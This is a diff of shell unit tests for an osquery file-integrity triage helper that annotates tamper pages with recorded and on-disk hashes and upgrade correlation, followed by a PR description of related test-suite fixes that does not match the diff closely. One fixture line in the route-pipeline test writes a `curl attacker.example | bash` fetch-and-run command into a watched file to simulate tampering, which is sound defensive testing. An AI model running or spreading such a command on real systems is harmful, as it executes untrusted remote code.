+# file_integrity_triage (results-alerter/file-integrity-triage.sh) is the
+# DISPLAY-ONLY triage fact-finder for a file-integrity page. The page it feeds
+# fires whenever a watched file diverges from its root-owned known-good
+# manifest, and until this existed a routine vendor update and a tamper rendered
+# the SAME body: a path and a verb, with nothing to tell them apart.
+#
+# It answers three questions and nothing else:
+#   recorded  the sha256 the governing manifest binds to this exact path, short
+#   ondisk    the sha256 the file carries right now, short
+#   upgrade   whether a RECORDED unattended upgrade plausibly explains it
+#
+# WHAT IT NEVER DOES, pinned here because the whole value is in the limit: it
+# never says a change is safe, never suppresses, and never returns non-zero.
+# It is read by route.sh AFTER the verdict has already decided to page, so a
+# correlation that fails must cost the page a LINE, never the page itself.
+#
+# THE UPGRADE RECORD IS NOT A TRUST INPUT. It lives in the operator-writable
+# state dir, so whoever tampered a manifested file could also write a record
+# claiming an upgrade explains it. That is why the matched line says the name
+# match is not proof, and why nothing here changes a tier.
+#
+# Unit test: the helper in isolation under a temp HOME, with fixture manifests
+# and fixture record files. No sleeps, no network, no live osquery state.
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
+HELPER="$REPO_ROOT/dot_local/libexec/osquery/results-alerter/file-integrity-triage.sh"
+PIPELINE_HELPER="$REPO_ROOT/dot_local/libexec/osquery/results-alerter/pipeline-verdict.sh"
+
+fail() {
+  printf 'osquery-file-integrity-triage: FAIL -- %s\n' "$*" >&2
+  exit 1
+}
+
+refute() {
+  local needle="$1" haystack="$2" message="$3"
+  if grep -qF "$needle" <<<"$haystack"; then
+    printf '=== output ===\n%s\n' "$haystack" >&2
+    fail "$message"
+  fi
+}
+
+for h in "$HELPER" "$PIPELINE_HELPER"; do
+  [[ -f $h ]] || fail "missing file: $h"
+done
+
+work="$(mktemp -d)"
+trap 'rm -rf "$work"' EXIT
+home="$work/home"
+mkdir -p "$home/.local/libexec/osquery"
+
+target="$home/.local/libexec/osquery/results-alerter.sh"
+printf 'echo tampered\n' >"$target"
+chmod 755 "$target"
+disk_hash="$(shasum -a 256 "$target" | awk '{print $1}')"
+recorded_hash="1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef"
+
+manifest="$work/pipeline-known-good.sha256"
+printf '%s 0755 %s %s\n' "$recorded_hash" "$(id -u)" "$target" >"$manifest"
+
+record="$work/last-upgrade-changes.tsv"
+
+# triage <target> -- run the helper in a fresh subshell against the fixtures.
+# stderr is kept separate so the LOUD-degradation cases can assert on it while
+# stdout stays parseable JSON.
+triage_stderr="$work/stderr"
+triage() {
+  : >"$triage_stderr"
+  HOME="$home" OSQUERY_PIPELINE_MANIFEST="$manifest" \
+    OSQUERY_MANAGED_BIN_MANIFEST="$work/no-bin-manifest.sha256" \
+    OSQUERY_UPGRADE_RECORD="$record" \
+    bash -c '
+      # The REAL alerter entry sources its helpers under errexit, so every case
+      # here runs under it too. Without this line the arithmetic guards inside
+      # the row loop are exercised in a mode production never uses, and a helper
+      # that aborts mid-record would pass here and lose facts in the field.
+      set -euo pipefail
+      source "$1"
+      source "$2"
+      file_integrity_triage "$3"
+    ' _ "$PIPELINE_HELPER" "$HELPER" "$1" 2>"$triage_stderr"
+}
+
+# assert_json <output> -- every rendered value reaches the page through
+# render-page.sh, whose jq program is bash SINGLE-QUOTED. An apostrophe anywhere
+# in this output would end that quoting and break the renderer, so the ban is
+# pinned on the producer side too, not only by reading the renderer.
+assert_json() {
+  local out="$1" what="$2"
+  jq -e . >/dev/null 2>&1 <<<"$out" || fail "$what: the output is not valid JSON -- $out"
+  refute "'" "$out" "$what: the output holds an apostrophe, which breaks the single-quoted render jq"
+}
+
+iso_at() { # <epoch> -> the ISO 8601 UTC stamp for it, the shape the record holds
+  date -u -r "$1" +%Y-%m-%dT%H:%M:%SZ 2>/dev/null ||
+    date -u -d "@$1" +%Y-%m-%dT%H:%M:%SZ
+}
+
+now="$(date +%s)"
+recent_epoch=$((now - 3600))
+recent_iso="$(iso_at "$recent_epoch")"
+stale_epoch=$((now - 30 * 86400))
+stale_iso="$(iso_at "$stale_epoch")"
+
+write_record() { # <epoch> <iso> <tsv-row...>
+  local epoch="$1" iso="$2"
+  shift 2
+  printf '%s\t%s\n' "$epoch" "$iso" >"$record"
+  local row
+  for row in "$@"; do printf '%s\n' "$row" >>"$record"; done
+}
+
+# ---- 1. The hashes. The page has to say WHICH bytes disagree, in a form a human
+#      can read back off a terminal, so both sides are the short prefix of the
+#      full sha256 and neither is invented when it cannot be read. ----
+write_record "$recent_epoch" "$recent_iso"
+out="$(triage "$target")"
+assert_json "$out" "hashes"
+[[ "$(jq -r '.recorded' <<<"$out")" == "${recorded_hash:0:12}" ]] ||
+  fail "the recorded hash is not the manifest tuple prefix -- $out"
+[[ "$(jq -r '.ondisk' <<<"$out")" == "${disk_hash:0:12}" ]] ||
+  fail "the on-disk hash is not the current file prefix -- $out"
+
+# ---- 2. A recorded upgrade whose package NAME matches the flagged file renders
+#      the transition, the timestamp, AND the statement that a name match is not
+#      proof. Naming it without that qualifier would be the one thing this must
+#      never do: read as an all-clear. ----
+write_record "$recent_epoch" "$recent_iso" \
+  "$(printf 'results-alerter.sh\tchanged\t1.2.3\t1.2.4')" \
+  "$(printf 'jq\tchanged\t1.7.1\t1.8.0')"
+out="$(triage "$target")"
+assert_json "$out" "matched upgrade"
+upgrade="$(jq -r '.upgrade' <<<"$out")"
+grep -qF 'recorded upgrade: results-alerter.sh 1.2.3 -> 1.2.4' <<<"$upgrade" ||
+  fail "a matching recorded upgrade did not render the transition -- $upgrade"
+grep -qF "$recent_iso" <<<"$upgrade" ||
+  fail "a matching recorded upgrade did not render its timestamp -- $upgrade"
+grep -qF 'not proof' <<<"$upgrade" ||
+  fail "a matching recorded upgrade read as a verdict instead of a lead -- $upgrade"
+refute 'safe' "$upgrade" "the upgrade line called a change safe"
+
+# ---- 3. A record with no matching name says so, and still states WHAT the run
+#      changed. The mapping from a file to the package that ships it is not
+#      knowable from this record, so the honest answer is the recent activity,
+#      never a claimed mapping. ----
+write_record "$recent_epoch" "$recent_iso" \
+  "$(printf 'jq\tchanged\t1.7.1\t1.8.0')" \
+  "$(printf 'yq\tchanged\t4.53.3\t4.54.0')"
+out="$(triage "$target")"
+assert_json "$out" "unmatched upgrade"
+upgrade="$(jq -r '.upgrade' <<<"$out")"
+grep -qF 'no recorded upgrade names this file' <<<"$upgrade" ||
+  fail "an unmatched record did not say so -- $upgrade"
+grep -qF 'jq' <<<"$upgrade" ||
+  fail "an unmatched record did not state what the run DID change -- $upgrade"
+
+# ---- 4. A record older than the correlation window cannot explain anything, and
+#      says which window it fell out of rather than going quiet. ----
+write_record "$stale_epoch" "$stale_iso" \
+  "$(printf 'results-alerter.sh\tchanged\t1.2.3\t1.2.4')"
+out="$(triage "$target")"
+assert_json "$out" "stale record"
+upgrade="$(jq -r '.upgrade' <<<"$out")"
+grep -qF 'no recorded upgrade in the last' <<<"$upgrade" ||
+  fail "a record outside the window was not reported as out of window -- $upgrade"
+refute 'recorded upgrade: results-alerter.sh' "$upgrade" \
+  "a record outside the window was still offered as an explanation"
+
+# ---- 5. NO RECORD AT ALL. The page must still render, with a line saying the
+#      correlation had nothing to work with. ----
+rm -f "$record"
+out="$(triage "$target")"
+assert_json "$out" "absent record"
+grep -qF 'no upgrade record' <<<"$(jq -r '.upgrade' <<<"$out")" ||
+  fail "an absent record did not render a stated no-record line -- $out"
+
+# ---- 6. A MALFORMED record degrades LOUDLY: the page keeps its line, the helper
+#      still exits 0, and the reason lands on stderr (which is the alerter's
+#      launchd log). A correlation that cannot be trusted must not be rendered as
+#      one, and must not take the page down with it. ----
+printf 'not-an-epoch\tnot-an-iso\nrubbish\n' >"$record"
+rc=0
+out="$(triage "$target")" || rc=$?
+[[ $rc -eq 0 ]] || fail "a malformed record made the helper exit $rc; a page must never be lost to it"
+assert_json "$out" "malformed record"
+grep -qF 'could not be read' <<<"$(jq -r '.upgrade' <<<"$out")" ||
+  fail "a malformed record did not render a stated could-not-read line -- $out"
+[[ -s $triage_stderr ]] ||
+  fail "a malformed record degraded SILENTLY; it must say so on stderr"
+
+# ---- 7. A file that is GONE (the DELETED verb reaches this helper too) still
+#      yields a rendered fact rather than an empty field or a crash. ----
+write_record "$recent_epoch" "$recent_iso"
+rc=0
+out="$(triage "$home/.local/libexec/osquery/vanished.sh")" || rc=$?
+[[ $rc -eq 0 ]] || fail "a vanished target made the helper exit $rc"
+assert_json "$out" "vanished target"
+[[ "$(jq -r '.ondisk' <<<"$out")" == "absent" ]] ||
+  fail "a vanished target did not render its on-disk state as absent -- $out"
+[[ "$(jq -r '.recorded' <<<"$out")" == "not in the manifest" ]] ||
+  fail "an unmanifested target did not say the manifest has no tuple for it -- $out"
+
+printf 'osquery-file-integrity-triage: OK (short recorded/on-disk hashes; a name-matching record renders the transition and says it is not proof; an unmatched, stale, absent or malformed record each degrade to a stated line, loudly and without losing the page)\n'

--- a/test/unit/osquery-render-page.sh
+++ b/test/unit/osquery-render-page.sh
@@ -107,9 +107,53 @@ page_cap_hard_limits_length() {
   [[ $body_len -lt 2000 ]] || fail "page cap: pbody must be under 2000 chars, got $body_len"
 }
 
+# --- file-integrity triage lines ----------------------------------------------
+# A file-integrity page fires when a watched file leaves its known-good manifest,
+# and for a long time every one of them rendered as a path and a verb: a vendor
+# update and a tamper produced the same body. When the router attaches triage
+# facts the block carries them, so the operator can see WHICH bytes disagree and
+# whether a recorded upgrade plausibly explains it. A finding with no triage
+# object renders exactly as it did before, because the arm is what most
+# file_events pages (ssh, sshd_config) still take.
+triage_lines_render_when_present() {
+  local out pbody
+  out="$(
+    render_page_run <<'EOF'
+{"q":"file_events_recent","act":"added","sev":"CRIT","cols":{"category":"pipeline_integrity","target_path":"/Users/x/.local/libexec/osquery/route.sh","action":"UPDATED"},"ep":"/Users/x/.local/libexec/osquery/route.sh","triage":{"recorded":"aaaaaaaaaaaa","ondisk":"bbbbbbbbbbbb","upgrade":"recorded upgrade: route.sh 1.0 -> 1.1 at 2026-08-03T12:00:00Z (the name matches this file, which is not proof)"}}
+EOF
+  )"
+  pbody="$(jq -r '.pbody' <<<"$out")"
+  [[ $pbody == *"aaaaaaaaaaaa"* ]] || fail "triage: the recorded hash is missing -- $pbody"
+  [[ $pbody == *"bbbbbbbbbbbb"* ]] || fail "triage: the on-disk hash is missing -- $pbody"
+  [[ $pbody == *"recorded upgrade: route.sh 1.0 -> 1.1"* ]] ||
+    fail "triage: the upgrade correlation is missing -- $pbody"
+  [[ $pbody == *"not proof"* ]] ||
+    fail "triage: the correlation lost the qualifier that keeps it from reading as an all-clear -- $pbody"
+  # The change is additive: the block keeps the path, the verb and the next step
+  # that made it actionable in the first place.
+  [[ $pbody == *"Security tooling changed"* ]] || fail "triage: the header changed -- $pbody"
+  [[ $pbody == *"/Users/x/.local/libexec/osquery/route.sh"* ]] || fail "triage: the path is gone -- $pbody"
+  [[ $pbody == *"shasum -a 256"* ]] || fail "triage: the next step is gone -- $pbody"
+}
+
+triage_absent_renders_the_old_block() {
+  local out pbody
+  out="$(
+    render_page_run <<'EOF'
+{"q":"file_events_recent","act":"added","sev":"CRIT","cols":{"category":"sshd_config","target_path":"/etc/ssh/sshd_config","action":"UPDATED"},"ep":"/etc/ssh/sshd_config"}
+EOF
+  )"
+  pbody="$(jq -r '.pbody' <<<"$out")"
+  [[ $pbody == *"sshd_config changed"* ]] || fail "no-triage: the header is missing -- $pbody"
+  [[ $pbody != *"Recorded:"* ]] || fail "no-triage: a triage line rendered with nothing behind it -- $pbody"
+  [[ $pbody != *"Upgrade record:"* ]] || fail "no-triage: a triage line rendered with nothing behind it -- $pbody"
+}
+
 normal_block_and_basename_privacy
 field_cap_truncates_an_over_long_value
 block_cap_limits_to_eight_blocks
 page_cap_hard_limits_length
+triage_lines_render_when_present
+triage_absent_renders_the_old_block
 
-printf 'osquery-render-page: OK (CRIT block header/fields/nextstep; basename-only secret+auth files with no path/sha256; 240-char field cap; 8-block cap; 1900-char page cap)\n'
+printf 'osquery-render-page: OK (CRIT block header/fields/nextstep; basename-only secret+auth files with no path/sha256; 240-char field cap; 8-block cap; 1900-char page cap; file-integrity triage lines render when attached and nothing renders when they are not)\n'

--- a/test/unit/osquery-route-pipeline.sh
+++ b/test/unit/osquery-route-pipeline.sh
@@ -25,13 +25,14 @@ REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
 ROUTE="$REPO_ROOT/dot_local/libexec/osquery/results-alerter/route.sh"
 PIPELINE_HELPER="$REPO_ROOT/dot_local/libexec/osquery/results-alerter/pipeline-verdict.sh"
 ALLOWLIST_HELPER="$REPO_ROOT/dot_local/libexec/osquery/results-alerter/allowlist-verdict.sh"
+TRIAGE_HELPER="$REPO_ROOT/dot_local/libexec/osquery/results-alerter/file-integrity-triage.sh"
 
 fail() {
   printf 'osquery-route-pipeline: FAIL -- %s\n' "$*" >&2
   exit 1
 }
 
-for h in "$ROUTE" "$PIPELINE_HELPER" "$ALLOWLIST_HELPER"; do
+for h in "$ROUTE" "$PIPELINE_HELPER" "$ALLOWLIST_HELPER" "$TRIAGE_HELPER"; do
   [[ -f $h ]] || fail "missing helper: $h"
 done
 
@@ -52,19 +53,29 @@ fe() { # <category> <target_path> <sha256> <verb>
 
 # run_gate <manifest> <bin-manifest> <finding...> -> page NDJSON on stdout (digests
 # go to the spy).
+#
+# TRIAGE_OVERRIDE swaps the triage helper for a hostile one, which is how the
+# never-lose-a-page pin below is driven. UPGRADE_RECORD points the real helper at
+# a fixture, so a test run never reads the operator's live record.
 run_gate() {
   local manifest="$1" bin_manifest="$2"
   shift 2
   printf '%s\n' "$@" |
     HOME="$home" OSQUERY_PIPELINE_MANIFEST="$manifest" \
       OSQUERY_MANAGED_BIN_MANIFEST="$bin_manifest" OSQUERY_PIPELINE_REHASH_DELAY=0 \
-      OSQUERY_LAUNCHD_ALLOWLIST="$work/no-allowlist.txt" DIGEST_SPY="$spy" bash -c '
+      OSQUERY_LAUNCHD_ALLOWLIST="$work/no-allowlist.txt" DIGEST_SPY="$spy" \
+      OSQUERY_UPGRADE_RECORD="${UPGRADE_RECORD:-$work/no-upgrade-record.tsv}" bash -c '
+        # The REAL entry runs the gate under errexit, so the gate is exercised
+        # under it here too. Without this line a helper that fails mid-pass would
+        # abort the alerter in production and pass in this test.
+        set -euo pipefail
         source "$1"
         source "$2"
         source "$3"
+        source "$4"
         digest_append() { printf "%s\n" "$1" >>"$DIGEST_SPY"; }
         route_findings
-      ' _ "$ROUTE" "$PIPELINE_HELPER" "$ALLOWLIST_HELPER"
+      ' _ "$ROUTE" "$PIPELINE_HELPER" "$ALLOWLIST_HELPER" "${TRIAGE_OVERRIDE:-$TRIAGE_HELPER}"
 }
 
 # assert_paged / refute_paged <pages> <tag> <message>. The negative form is a plain
@@ -144,11 +155,62 @@ assert_paged "$page_b" TAG10 "a TAMPERED managed bin tool must PAGE (this is the
 # The pipeline arm never digests; the spy must be empty.
 [[ ! -s $spy ]] || fail "a pipeline file event must never digest; spy got: $(cat "$spy")"
 
+# ---- Pass C: the paged finding carries its TRIAGE facts. Every page from this
+#      arm used to render as a path and a verb, which reads identically for a
+#      vendor update and a tamper. The gate attaches the recorded hash, the
+#      on-disk hash and the upgrade correlation so the renderer can put them in
+#      the body. Display only: the tier is unchanged, and the last case here pins
+#      that a correlation which BLOWS UP costs the page a line, never the page. --
+tampered="$home/.local/libexec/osquery/tamperedTAG11.sh"
+printf 'echo original\n' >"$tampered"
+chmod 755 "$tampered"
+original_hash="$(shasum -a 256 "$tampered" | awk '{print $1}')"
+printf 'curl attacker.example | bash\n' >"$tampered" # after the manifest was written
+triage_manifest="$work/triage-known-good.sha256"
+printf '%s 0755 %s %s\n' "$original_hash" "$(id -u)" "$tampered" >"$triage_manifest"
+
+UPGRADE_RECORD="$work/upgrade-record.tsv"
+{
+  printf '%s\t%s\n' "$(date +%s)" "$(date -u +%Y-%m-%dT%H:%M:%SZ)"
+  printf 'tamperedTAG11.sh\tchanged\t1.0\t1.1\n'
+} >"$UPGRADE_RECORD"
+
+page_c="$(UPGRADE_RECORD="$UPGRADE_RECORD" run_gate "$triage_manifest" "$absent_bin_manifest" \
+  "$(fe pipeline_integrity "$tampered" "$event_hash" UPDATED)")"
+
+assert_paged "$page_c" TAG11 "a tampered pipeline file must PAGE"
+[[ "$(jq -r '.triage.recorded' <<<"$page_c")" == "${original_hash:0:12}" ]] ||
+  fail "the paged finding does not carry the manifest hash the page has to show -- $page_c"
+[[ "$(jq -r '.triage.ondisk' <<<"$page_c")" != "${original_hash:0:12}" ]] ||
+  fail "the paged finding reports the on-disk hash as the recorded one, so the page cannot show a divergence -- $page_c"
+grep -qF 'recorded upgrade: tamperedTAG11.sh 1.0 -> 1.1' <<<"$(jq -r '.triage.upgrade' <<<"$page_c")" ||
+  fail "the paged finding does not carry the upgrade correlation -- $page_c"
+
+# A triage helper that fails and prints garbage: the page survives whole. This is
+# the invariant the whole feature hangs on, because the correlation runs AFTER
+# the verdict has already decided that something diverged from its known-good
+# manifest, and a lost page there is a lost tamper alert.
+broken_triage="$work/broken-triage.sh"
+cat >"$broken_triage" <<'BROKEN'
+# shellcheck shell=bash
+file_integrity_triage() {
+  printf 'not json at all {{{\n'
+  return 3
+}
+BROKEN
+page_d=""
+broken_rc=0
+page_d="$(TRIAGE_OVERRIDE="$broken_triage" run_gate "$triage_manifest" "$absent_bin_manifest" \
+  "$(fe pipeline_integrity "$tampered" "$event_hash" UPDATED)")" || broken_rc=$?
+[[ $broken_rc -eq 0 ]] ||
+  fail "a triage helper that FAILS aborted the gate itself (exit $broken_rc), so the page was lost"
+assert_paged "$page_d" TAG11 "a triage helper that FAILS must not take the page down with it"
+
 # Every paged line is a CRIT finding.
-for out in "$page_a" "$page_b"; do
+for out in "$page_a" "$page_b" "$page_c" "$page_d"; do
   [[ -z $out ]] && continue
   [[ "$(jq -s 'all(.[]; .sev == "CRIT")' <<<"$out")" == true ]] ||
     fail "every paged pipeline finding must carry .sev == CRIT"
 done
 
-printf 'osquery-route-pipeline: OK (fail-safe PAGE for a libexec file, our own home-dir plist and a bin path with no manifest; a non-osquery plist, a /Library twin and an unmanaged bin shim SILENT; manifest exact match SILENT; a tampered managed bin tool and a delete PAGE; none digest)\n'
+printf 'osquery-route-pipeline: OK (fail-safe PAGE for a libexec file, our own home-dir plist and a bin path with no manifest; a non-osquery plist, a /Library twin and an unmanaged bin shim SILENT; manifest exact match SILENT; a tampered managed bin tool and a delete PAGE; a paged finding carries its recorded/on-disk hashes and the upgrade correlation, and survives a triage helper that fails; none digest)\n'

--- a/test/unit/unattended-log-lib.sh
+++ b/test/unit/unattended-log-lib.sh
@@ -692,6 +692,44 @@ line="$(unattended_log_change_line "$before" "$after" subject "$CAVEAT" versions
 grep -qF '2.03.0' <<<"$line" ||
   fail "the control character was not stripped in place (want the joined 2.03.0): '$line'"
 
+# ── 4d. The RAW DIFF under that summary. A second consumer needs what moved as
+#       data rather than as a Discord sentence: the weekly Homebrew job persists
+#       it so the osquery file-integrity page can ask whether a recorded upgrade
+#       plausibly explains a file that changed. Both readings come from this one
+#       walk, so the channel and the page can never disagree about what a week
+#       did. ────────────────────────────────────────────────────────────────
+tuples() { unattended_log_change_tuples "$before" "$after"; }
+
+write_snapshot "$before" "alpha:aaa1" "beta:bbb1"
+write_snapshot "$after" "alpha:aaa1" "beta:bbb1"
+[[ -z "$(tuples)" ]] || fail "an unchanged pair emitted tuples: $(tuples)"
+
+write_snapshot "$before" "alpha:aaa1" "beta:bbb1"
+write_snapshot "$after" "alpha:aaa2" "beta:bbb1"
+[[ "$(tuples)" == "$(printf 'alpha\tchanged\taaa1\taaa2')" ]] ||
+  fail "a changed entry did not render as a changed tuple: $(tuples)"
+
+write_snapshot "$before" "alpha:aaa1"
+write_snapshot "$after" "alpha:aaa1" "delta:ddd1"
+[[ "$(tuples)" == "$(printf 'delta\tadded\t\tddd1')" ]] ||
+  fail "an added entry did not render with an empty before column: $(tuples)"
+
+write_snapshot "$before" "alpha:aaa1" "beta:bbb1"
+write_snapshot "$after" "alpha:aaa1"
+[[ "$(tuples)" == "$(printf 'beta\tremoved\tbbb1\t')" ]] ||
+  fail "a removed entry did not render with an empty after column: $(tuples)"
+
+# A TAB inside a fingerprint must not shift a column. The tuple is tab
+# separated and is read back field by field, so a fingerprint carrying one
+# would move the state into a version and make a change read as something the
+# consumer cannot describe. Tabs are DELETED rather than replaced, which is
+# what the code-span quoting already does to every control character, so the
+# rendered summary reads exactly as it did before.
+write_snapshot "$before" 'tabbed:1.0'
+printf 'tabbed\t2.0\t3.0\n' >"$after"
+[[ "$(tuples)" == "$(printf 'tabbed\tchanged\t1.0\t2.03.0')" ]] ||
+  fail "a tab inside a fingerprint shifted a tuple column: $(tuples)"
+
 # ── 5. The route name the library posts to is the one the config declares and
 #      the apply-time status check probes. A rename in one place and not the
 #      others is a 404 on every entry, which relay reports but nobody reads. ──


### PR DESCRIPTION
## Context

This is a chezmoi dotfiles repository whose tests run in four camps (unit, integration, e2e,
test-system). Continuous integration is the only gate that runs all four: the commit hook runs the unit
camp alone, and the pre-push hook runs lint only, so a GitHub Actions job on `macos-latest` is the single
place the whole suite executes. CI's verdict is therefore the one signal worth trusting, and anything
that lets it turn on the runner instead of on the code corrupts it.

The osquery security pipeline (a local osquery installation whose findings are routed to pages, digests,
or log-only records) owns roughly sixty test files, the largest concentration in the repository. This
branch audits those files for couplings to the machine and removes the ones that can flip the verdict.

## Summary

- Six suites treated a missing tool as a reason to exit 0. `test/unit/osquery-queue-counts.sh`,
  `test/unit/osquery-store-quote-safety.sh`, `test/unit/osquery-local-notify-durable.sh`,
  `test/unit/osquery-loud-local-status.sh`, and `test/integration/osquery-queue-counts-wal.sh` skipped
  themselves without `sqlite3`; `test/integration/osquery-page-allowlist-seed.sh` skipped without `jq`.
  Each is a hard failure now. Neither tool is a `flake.nix` buildInput, so CI resolves `jq` from the
  runner image and `sqlite3` from `/usr/bin`, and an image change would have turned all six silently
  green.
- `test/e2e/osquery-alerter-hostile-columns.bats` never set `OSQUERY_PIPELINE_MANIFEST`, so its verdict
  fell back to `/var/osquery/pipeline-known-good.sha256`, a real machine path the suite never wrote. It
  now binds a manifest inside its sandbox home, and a new control test asserts that the genuine
  allowlisted agent is suppressed.
- `test/integration/osquery-pipeline-manifest-agreement.sh` raced a backgrounded one-second writer
  against a four-second settle ceiling, and its elapsed-time assertions left five seconds of headroom.
  Each ceiling there is a bound the passing path returns well inside, so all six are wide enough now that
  runner load cannot decide the result.
- Three more waits were too tight for a shared runner: `test/integration/osquery-queue-counts-wal.sh`
  blocked forever on a `read` from a WAL holder that stayed alive without confirming, and it is bounded
  now; `test/e2e/osquery-alert-drainer.bats` gave a forked stub two seconds to write its pid file; and
  `test/integration/osquery-allowlist.bats` gave a lingering grandchild five seconds to outlive a real
  `chezmoi apply`.
- The task named seven tests and ten are changed here, across four coupling classes. Every one is
  reproduced by a mutation in the table below, so none is padding. Three further findings were
  investigated and left alone, with the reasons under the review guide.

## How it was verified

Every reworked test keeps a demonstrated RED path. Each row below was produced by mutating the named
source, running the test, and restoring the source. The control (unmutated) run of each test is green.

| Test | Mutation applied | Result |
| --- | --- | --- |
| `test/unit/osquery-queue-counts.sh` | `sqlite3` removed from PATH | RED, names the missing prerequisite |
| `test/unit/osquery-queue-counts.sh` | corrupt-store branch reports a false zero | RED, `a false zero hides a real backlog` |
| `test/unit/osquery-store-quote-safety.sh` | `sqlite3` removed from PATH | RED |
| `test/unit/osquery-store-quote-safety.sh` | URL quote doubling dropped from the store helper | RED, `URL did not round-trip intact` |
| `test/unit/osquery-local-notify-durable.sh` | `sqlite3` removed from PATH | RED |
| `test/unit/osquery-local-notify-durable.sh` | confirmed banner no longer deletes its row | RED, `expected 0 row(s) once the watcher settled, still 1` |
| `test/unit/osquery-loud-local-status.sh` | `sqlite3` removed from PATH | RED |
| `test/unit/osquery-loud-local-status.sh` | `_loud_local` always returns 0 | RED, `expected a NONZERO status, got 0` |
| `test/integration/osquery-queue-counts-wal.sh` | `sqlite3` removed from PATH | RED |
| `test/integration/osquery-queue-counts-wal.sh` | counters opened `immutable=1`, skipping the WAL | RED, `expected '3', got '0'` |
| `test/integration/osquery-queue-counts-wal.sh` | holder never emits its marker | RED at 5s with the bound; without it, still blocked when an external kill landed at 10s |
| `test/integration/osquery-page-allowlist-seed.sh` | `jq` removed from PATH | RED |
| `test/integration/osquery-page-allowlist-seed.sh` | digest agent's allowlist tuple deleted | RED, names the agent that would self-page |
| `test/e2e/osquery-alerter-hostile-columns.bats` | manifest vouching disabled (the pre-change world) | control RED while the three injection pins stayed GREEN, which is the evidence they were vacuous before |
| `test/e2e/osquery-alerter-hostile-columns.bats` | in-band 0x1F re-split reintroduced into the verdict | `HOSTILE-0x1F` RED |
| `test/integration/osquery-pipeline-manifest-agreement.sh` | settle window never waits | RED, `must resolve to SILENT` |
| `test/integration/osquery-pipeline-manifest-agreement.sh` | settle budget becomes per-finding | RED, `10 misses took 35s` against the 20s ceiling |
| `test/integration/osquery-pipeline-manifest-agreement.sh` | settle wait multiplied 30x (the unbounded shape) | RED, `60s for a 2s window` |
| `test/e2e/osquery-alert-drainer.bats` | banner child inherits the drain lock fd | `T-DRAIN-lock-fd-leak` RED |
| `test/integration/osquery-allowlist.bats` | osqueryi capture inherits the writer lock fd | `the writer's lock never leaks to a child` RED |

The PATH mutations run each test on a mirror of the real PATH with one tool removed, so the guard under
test is the only thing that changes.

The full gate is green. `just l` reformatted nothing, and `just test` exited 0 across all four camps: 201
executable `.sh` tests plus 329 bats tests (264 integration, 46 e2e, 19 test-system), with zero `not ok`
lines.

## Effect of merging

CI going red starts meaning the code is broken again for these ten files. Nothing about the live machine
changes: every file touched is under `test/`, which `.chezmoiignore` keeps out of the target state, so no
`chezmoi apply` behaves differently and no osquery agent, plist, or library is modified. Production
sources were temporarily mutated to produce the table above, and every one was restored from git.

## Review guide

Read in this order.

`test/e2e/osquery-alerter-hostile-columns.bats` carried the worst coupling, and it is the only file whose
assertions changed instead of its plumbing. Its three injection pins were passing while the suppression
path they exist to defeat could not run at all, because nothing in the sandbox could vouch for the
allowlist. The setup block and the new `HOSTILE-control` test are what make the other three mean
something, and this file's two mutation rows are the argument for that.

`test/integration/osquery-pipeline-manifest-agreement.sh` next: six wall-clock sites, with the reasoning
for each widened number in the comment beside it. Check whether a widened ceiling still separates the bug
it pins from a healthy run. For the ten-miss case the bug costs thirty seconds against a twenty-second
ceiling, and the mutation row measuring thirty-five seconds is that check.

The six skip-to-fail conversions are mechanical and read together. The remaining three files are one
changed number or one added flag each.

Three findings were deliberately left alone. The `chezmoi` skip guards in the launch-agent and config
suites cannot fire in CI, because `chezmoi` is a `flake.nix` buildInput and resolves from the nix store;
that is the distinction which put `jq` and `sqlite3` in scope and left these out. The `lockf` skips
assert a darwin-only kernel guarantee, and asserting the host is the shape
`test/unit/no-empty-render-skip-on-darwin.sh` already blesses, as against inferring it.
`test/integration/osquery-feature-set-location.sh` reads through `git grep`, which searches the working
tree and not the index (checked against an unstaged probe line), and it fails closed on any git error.
